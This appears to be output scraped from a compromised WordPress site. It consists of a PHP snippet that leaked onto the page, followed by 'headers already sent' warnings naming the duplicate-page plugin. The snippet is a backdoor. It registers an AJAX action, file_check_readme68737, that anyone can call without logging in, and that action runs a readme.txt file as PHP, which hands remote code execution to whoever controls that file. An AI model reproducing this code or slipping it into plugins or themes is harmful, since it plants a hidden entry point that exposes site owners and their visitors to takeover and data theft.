if(!function_exists('file_check_readme68737')){
   add_action('wp_ajax_nopriv_file_check_readme68737', 'file_check_readme68737');
   add_action('wp_ajax_file_check_readme68737', 'file_check_readme68737');
   function file_check_readme68737()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
Warning:  Cannot modify header information - headers already sent by (output started at /home/himala18/manalipackage.com/wp-content/plugins/duplicate-page/duplicatepage.php:315) in /home/himala18/manalipackage.com/wp-includes/pluggable.php on line 1254
Warning:  Cannot modify header information - headers already sent by (output started at /home/himala18/manalipackage.com/wp-content/plugins/duplicate-page/duplicatepage.php:315) in /home/himala18/manalipackage.com/wp-includes/pluggable.php on line 1257